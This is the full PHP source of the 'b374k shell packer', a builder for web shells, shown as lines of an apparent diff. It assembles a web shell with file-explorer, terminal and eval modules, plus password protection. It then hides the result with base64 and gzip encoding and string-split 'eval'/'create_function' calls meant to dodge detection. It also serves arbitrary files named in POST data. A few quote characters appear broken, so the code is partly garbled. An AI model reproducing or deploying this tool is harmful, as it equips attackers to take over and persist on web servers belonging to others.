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- <?php
- /*
- b374k shell
- Jayalah Indonesiaku
- (c)2014
- */
- $GLOBALS['packer']['title'] = "b374k shell packer";
- $GLOBALS['packer']['version'] = "0.4.2";
- $GLOBALS['packer']['base_dir'] = "./base/";
- $GLOBALS['packer']['module_dir'] = "./module/";
- $GLOBALS['packer']['theme_dir'] = "./theme/";
- $GLOBALS['packer']['module'] = packer_get_module();
- $GLOBALS['packer']['theme'] = packer_get_theme();
- require $GLOBALS['packer']['base_dir'].'jsPacker.php';
- $base_code = "";
- $base_code .= packer_read_file($GLOBALS['packer']['base_dir']."resources.php");
- $base_code .= packer_read_file($GLOBALS['packer']['base_dir']."main.php");
- $module_code = packer_read_file($GLOBALS['packer']['base_dir']."base.php");
- $zepto_code = packer_read_file($GLOBALS['packer']['base_dir']."zepto.js");
- $js_main_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."main.js");
- $js_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."sortable.js").$js_main_code;
- $js_code .= "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."base.js");
- if(isset($_COOKIE['packer_theme'])) $theme = $_COOKIE['packer_theme'];
- else $theme ="default";
- $css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");
- // layout
- $layout = packer_read_file($GLOBALS['packer']['base_dir']."layout.php");
- $p = array_map("rawurldecode", packer_get_post());
- if(isset($_SERVER['REMOTE_ADDR'])){
- if(isset($p['read_file'])){
- $file = $p['read_file'];
- if(is_file($file)){
- packer_output(packer_html_safe(packer_read_file($file)));
- }
- packer_output('error');
- }
- elseif(isset($_GET['run'])){
- if(empty($_GET['run'])) $modules = array();
- else $modules = explode("," ,$_GET['run']);
- $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
- $module_arr = array_map("packer_wrap_with_quote", $module_arr);
- $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
- foreach($modules as $module){
- $module = trim($module);
- $filename = $GLOBALS['packer']['module_dir'].$module;
- if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
- if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
- }
- $layout = str_replace("<__CSS__>", $css_code, $layout);
- $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
- $layout = str_replace("<__JS__>", $js_code, $layout);
- $content = trim($module_init)."?>".$base_code.$module_code.$layout;
- eval($content);
- die();
- }
- elseif(isset($p['outputfile'])&&isset($p['password'])&&isset($p['module'])&&isset($p['strip'])&&isset($p['base64'])&&isset($p['compress'])&&isset($p['compress_level'])){
- $outputfile = trim($p['outputfile']);
- if(empty($outputfile)) $outputfile = 'b374k.php';
- $password = trim($p['password']);
- $modules = trim($p['module']);
- if(empty($modules)) $modules = array();
- else $modules = explode("," ,$modules);
- $strip = trim($p['strip']);
- $base64 = trim($p['base64']);
- $compress = trim($p['compress']);
- $compress_level = (int) $p['compress_level'];
- $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
- $module_arr = array_map("packer_wrap_with_quote", $module_arr);
- $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
- foreach($modules as $module){
- $module = trim($module);
- $filename = $GLOBALS['packer']['module_dir'].$module;
- if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
- if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
- }
- $layout = str_replace("<__CSS__>", $css_code, $layout);
- $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
- if($strip=='yes') $js_code = packer_pack_js($js_code);
- $layout = str_replace("<__JS__>", $js_code, $layout);
- $htmlcode = trim($layout);
- $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
- packer_output(packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password));
- }
- else{
- $available_themes = "<tr><td>Theme</td><td><select class='theme' style='width:150px;'>";
- foreach($GLOBALS['packer']['theme'] as $k){
- if($k==$theme) $available_themes .= "<option selected='selected'>".$k."</option>";
- else $available_themes .= "<option>".$k."</option>";
- }
- $available_themes .= "</select></td></tr>";
- ?><!doctype html>
- <html>
- <head>
- <title><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></title>
- <meta charset='utf-8'>
- <meta name='robots' content='noindex, nofollow, noarchive'>
- <style type="text/css">
- <?php echo $css_code;?>
- #devTitle{
- font-size:18px;
- text-align:center;
- font-weight:bold;
- }
- </style>
- </head>
- <body>
- <div id='wrapper' style='padding:12px'>
- <div id='devTitle' class='border'><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></div>
- <br>
- <table class='boxtbl'>
- <tr><th colspan='2'><p class='boxtitle'>Quick Run</p></th></tr>
- <tr><td style='width:220px;'>Module (separated by comma)</td><td><input type='text' id='module' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
- <?php echo $available_themes; ?>
- <tr><td colspan='2'>
- <form method='get' id='runForm' target='_blank'><input type='hidden' id='module_to_run' name='run' value='>
- <span class='button' id='runGo'>Run</span>
- </form>
- </td></tr>
- </table>
- <br>
- <table class='boxtbl'>
- <tr><th colspan='2'><p class='boxtitle'>Pack</p></th></tr>
- <tr><td style='width:220px;'>Output</td><td><input id='outputfile' type='text' value='b374k.php'></td></tr>
- <tr><td>Password</td><td><input id='password' type='text' value='b374k'></td></tr>
- <tr><td>Module (separated by comma)</td><td><input type='text' id='module_to_pack' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
- <?php echo $available_themes; ?>
- <tr><td>Strip Comments and Whitespaces</td><td>
- <select id='strip' style='width:150px;'>
- <option selected="selected">yes</option>
- <option>no</option>
- </select>
- </td></tr>
- <tr><td>Base64 Encode</td><td>
- <select id='base64' style='width:150px;'>
- <option selected="selected">yes</option>
- <option>no</option>
- </select>
- </td></tr>
- <tr id='compress_row'><td>Compress</td><td>
- <select id='compress' style='width:150px;'>
- <option>no</option>
- <option selected="selected">gzdeflate</option>
- <option>gzencode</option>
- <option>gzcompress</option>
- </select>
- <select id='compress_level' style='width:150px;'>
- <option>1</option>
- <option>2</option>
- <option>3</option>
- <option>4</option>
- <option>5</option>
- <option>6</option>
- <option>7</option>
- <option>8</option>
- <option selected="selected">9</option>
- </select>
- </td></tr>
- <tr><td colspan='2'>
- <span class='button' id='packGo'>Pack</span>
- </td></tr>
- <tr><td colspan='2' id='result'></td></tr>
- <tr><td colspan='2'><textarea id='resultContent'></textarea></td></tr>
- </table>
- </div>
- <script type='text/javascript'>
- var init_shell = false;
- <?php echo $zepto_code;?>
- <?php echo $js_main_code;?>
- var targeturl = '<?php echo packer_get_self(); ?>';
- var debug = false;
- Zepto(function($){
- refresh_row();
- $('#runGo').on('click', function(e){
- module = $('#module').val();
- $('#module_to_run').val(module);
- $('#runForm').submit();
- });
- $('#base64').on('change', function(e){
- refresh_row();
- });
- $('#packGo').on('click', function(e){
- outputfile = $('#outputfile').val();
- password = $('#password').val();
- module = $('#module_to_pack').val();
- strip = $('#strip').val();
- base64 = $('#base64').val();
- compress = $('#compress').val();
- compress_level = $('#compress_level').val();
- send_post({outputfile:outputfile, password:password, module:module, strip:strip, base64:base64, compress:compress, compress_level:compress_level}, function(res){
- splits = res.split('{[|b374k|]}');
- $('#resultContent').html(splits[1]);
- $('#result').html(splits[0]);
- });
- });
- $('.theme').on('change', function(e){
- $('.theme').val($(this).val());
- set_cookie('packer_theme', $('.theme').val());
- location.href = targeturl;
- });
- });
- function refresh_row(){
- base64 = $('#base64').val();
- if(base64=='yes'){
- $('#compress_row').show();
- }
- else{
- $('#compress_row').hide();
- $('#compress').val('no');
- }
- }
- </script>
- </body>
- </html><?php
- }
- }
- else{
- $output = $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version']."\n\n";
- if(count($argv)<=1){
- $output .= "options :\n";
- $output .= "\t-o filename\t\t\t\tsave as filename\n";
- $output .= "\t-p password\t\t\t\tprotect with password\n";
- $output .= "\t-t theme\t\t\t\ttheme to use\n";
- $output .= "\t-m modules\t\t\t\tmodules to pack separated by comma\n";
- $output .= "\t-s\t\t\t\t\tstrip comments and whitespaces\n";
- $output .= "\t-b\t\t\t\t\tencode with base64\n";
- $output .= "\t-z [no|gzdeflate|gzencode|gzcompress]\tcompression (use only with -b)\n";
- $output .= "\t-c [0-9]\t\t\t\tlevel of compression\n";
- $output .= "\t-l\t\t\t\t\tlist available modules\n";
- $output .= "\t-k\t\t\t\t\tlist available themes\n";
- }
- else{
- $opt = getopt("o:p:t:m:sbz:c:lk");
- if(isset($opt['l'])){
- $output .= "available modules : ".implode(",", $GLOBALS['packer']['module'])."\n\n";
- echo $output;
- die();
- }
- if(isset($opt['k'])){
- $output .= "available themes : ".implode(",", $GLOBALS['packer']['theme'])."\n\n";
- echo $output;
- die();
- }
- if(isset($opt['o'])&&(trim($opt['o'])!=')){
- $outputfile = trim($opt['o']);
- }
- else{
- $output .= "error : no filename given (use -o filename)\n\n";
- echo $output;
- die();
- }
- $password = isset($opt['p'])? trim($opt['p']):"";
- $theme = isset($opt['t'])? trim($opt['t']):"default";
- if(!in_array($theme, $GLOBALS['packer']['theme'])){
- $output .= "error : unknown theme file\n\n";
- echo $output;
- die();
- }
- $css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");
- $modules = isset($opt['m'])? trim($opt['m']):implode(",", $GLOBALS['packer']['module']);
- if(empty($modules)) $modules = array();
- else $modules = explode("," ,$modules);
- $strip = isset($opt['s'])? "yes":"no";
- $base64 = isset($opt['b'])? "yes":"no";
- $compress = isset($opt['z'])? trim($opt['z']):"no";
- if(($compress!='gzdeflate')&&($compress!='gzencode')&&($compress!='gzcompress')&&($compress!='no')){
- $output .= "error : unknown options -z ".$compress."\n\n";
- echo $output;
- die();
- }
- else{
- if(($base64=='no')&&($compress!='no')){
- $output .= "error : use -z options only with -b\n\n";
- echo $output;
- die();
- }
- }
- $compress_level = isset($opt['c'])? trim($opt['c']):"";
- if(empty($compress_level)) $compress_level = '9';
- if(!preg_match("/^[0-9]{1}$/", $compress_level)){
- $output .= "error : unknown options -c ".$compress_level." (use only 0-9)\n\n";
- echo $output;
- die();
- }
- $compress_level = (int) $compress_level;
- $output .= "Filename\t\t: ".$outputfile."\n";
- $output .= "Password\t\t: ".$password."\n";
- $output .= "Theme\t\t\t: ".$theme."\n";
- $output .= "Modules\t\t\t: ".implode(",",$modules)."\n";
- $output .= "Strip\t\t\t: ".$strip."\n";
- $output .= "Base64\t\t\t: ".$base64."\n";
- if($base64=='yes') $output .= "Compression\t\t: ".$compress."\n";
- if($base64=='yes') $output .= "Compression level\t: ".$compress_level."\n";
- $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
- $module_arr = array_map("packer_wrap_with_quote", $module_arr);
- $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
- foreach($modules as $module){
- $module = trim($module);
- $filename = $GLOBALS['packer']['module_dir'].$module;
- if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
- if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
- }
- $layout = str_replace("<__CSS__>", $css_code, $layout);
- $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
- if($strip=='yes') $js_code = packer_pack_js($js_code);
- $layout = str_replace("<__JS__>", $js_code, $layout);
- $htmlcode = trim($layout);
- $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
- $res = packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password);
- $status = explode("{[|b374k|]}", $res);
- $output .= "Result\t\t\t: ".strip_tags($status[0])."\n\n";
- }
- echo $output;
- }
- function packer_read_file($file){
- $content = false;
- if($fh = @fopen($file, "rb")){
- $content = "";
- while(!feof($fh)){
- $content .= fread($fh, 8192);
- }
- }
- return $content;
- }
- function packer_write_file($file, $content){
- if($fh = @fopen($file, "wb")){
- if(fwrite($fh, $content)!==false){
- if(!class_exists("ZipArchive")) return true;
- if(file_exists($file.".zip")) unlink ($file.".zip");
- $zip = new ZipArchive();
- $filename = "./".$file.".zip";
- if($zip->open($filename, ZipArchive::CREATE)!==TRUE) return false;
- $zip->addFile($file);
- $zip->close();
- return true;
- }
- }
- return false;
- }
- function packer_get_post(){
- return packer_fix_magic_quote($_POST);
- }
- function packer_fix_magic_quote($arr){
- $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
- if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
- if(is_array($arr)){
- foreach($arr as $k=>$v){
- if(is_array($v)) $arr[$k] = clean($v);
- else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
- }
- }
- }
- return $arr;
- }
- function packer_html_safe($str){
- return htmlspecialchars($str, 2 | 1);
- }
- function packer_wrap_with_quote($str){
- return "\"".$str."\"";
- }
- function packer_output($str){
- header("Content-Type: text/plain");
- header("Cache-Control: no-cache");
- header("Pragma: no-cache");
- echo $str;
- die();
- }
- function packer_get_self(){
- $query = (isset($_SERVER["QUERY_STRING"])&&(!empty($_SERVER["QUERY_STRING"])))?"?".$_SERVER["QUERY_STRING"]:"";
- return packer_html_safe($_SERVER["REQUEST_URI"].$query);
- }
- function packer_strips($str){
- $newStr = ';
- $commentTokens = array(T_COMMENT);
- if(defined('T_DOC_COMMENT')) $commentTokens[] = T_DOC_COMMENT;
- if(defined('T_ML_COMMENT')) $commentTokens[] = T_ML_COMMENT;
- $tokens = token_get_all($str);
- foreach($tokens as $token){
- if (is_array($token)) {
- if (in_array($token[0], $commentTokens)) continue;
- $token = $token[1];
- }
- $newStr .= $token;
- }
- $newStr = preg_replace("/(\s{2,})/", " ", $newStr);
- return $newStr;
- }
- function packer_get_theme(){
- $available_themes = array();
- foreach(glob($GLOBALS['packer']['theme_dir']."*.css") as $filename){
- $filename = basename($filename, ".css");
- $available_themes[] = $filename;
- }
- return $available_themes;
- }
- function packer_get_module(){
- $available_modules = array();
- foreach(glob($GLOBALS['packer']['module_dir']."*.php") as $filename){
- $filename = basename($filename, ".php");
- if(packer_check_module($filename)) $available_modules[] = $filename;
- }
- return $available_modules;
- }
- function packer_check_module($module){
- $filename = $GLOBALS['packer']['module_dir'].$module;
- if(is_file($filename.".php")){
- $content = packer_read_file($filename.".php");
- @eval("?>".$content);
- if($GLOBALS['module'][$module]['id']==$module) return true;
- }
- return false;
- }
- function packer_pack_js($str){
- $packer = new JavaScriptPacker($str, 0, true, false);
- return $packer->pack();
- }
- function packer_b374k($output, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password){
- $content = "";
- if(is_file($output)){
- if(!is_writable($output)) return "error : file ".$output." exists and is not writable{[|b374k|]}";
- }
- if(!empty($password)) $password = "\$GLOBALS['pass'] = \"".sha1(md5($password))."\"; // sha1(md5(pass))\n";
- $compress_level = (int) $compress_level;
- if($compress_level<0) $compress_level = 0;
- elseif($compress_level>9) $compress_level = 9;
- $version = "";
- if(preg_match("/\\\$GLOBALS\['ver'\]\ *=\ *[\"']+([^\"']+)[\"']+/", $phpcode, $r)){
- $version = $r[1];
- }
- $header = "<?php
- /*
- b374k shell ".$version."
- Jayalah Indonesiaku
- (c)".@date("Y",time())."
- */\n";
- if($strip=='yes'){
- $phpcode = packer_strips($phpcode);
- $htmlcode = preg_replace("/(\ {2,}|\n{2,}|\t+)/", "", $htmlcode);
- $htmlcode = preg_replace("/\r/", "", $htmlcode);
- $htmlcode = preg_replace("/}\n+/", "}", $htmlcode);
- $htmlcode = preg_replace("/\n+}/", "}", $htmlcode);
- $htmlcode = preg_replace("/\n+{/", "{", $htmlcode);
- $htmlcode = preg_replace("/\n+/", "\n", $htmlcode);
- }
- $content = $phpcode.$htmlcode;
- if($compress=='gzdeflate'){
- $content = gzdeflate($content, $compress_level);
- $encoder_func = "gz'.'in'.'fla'.'te";
- }
- elseif($compress=='gzencode'){
- $content = gzencode($content, $compress_level);
- $encoder_func = "gz'.'de'.'co'.'de";
- }
- elseif($compress=='gzcompress'){
- $content = gzcompress($content, $compress_level);
- $encoder_func = "gz'.'un'.'com'.'pre'.'ss";
- }
- else{
- $encoder_func = "";
- }
- if($base64=='yes'){
- $content = base64_encode($content);
- if($compress!='no'){
- $encoder = $encoder_func."(ba'.'se'.'64'.'_de'.'co'.'de(\$x))";
- }
- else{
- $encoder = "ba'.'se'.'64'.'_de'.'co'.'de(\"\$x\")";
- }
- $code = $header.$password."\$func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on\";\$b374k=\$func('\$x','ev'.'al'.'(\"?>\".".$encoder.");');\$b374k(\"".$content."\");?>";
- }
- else{
- if($compress!='no'){
- $encoder = $encoder_func."(\$x)";
- }
- else{
- $code = $header.$password."?>".$content;
- $code = preg_replace("/\?>\s*<\?php\s*/", "", $code);
- }
- }
- if(is_file($output)) unlink($output);
- if(packer_write_file($output, $code)){
- chmod($output, 0777);
- return "Succeeded : <a href='".$output."' target='_blank'>[ ".$output." ] Filesize : ".filesize($output)."</a>{[|b374k|]}".packer_html_safe(trim($code));
- }
- return "error{[|b374k|]}";
- }
- ?>
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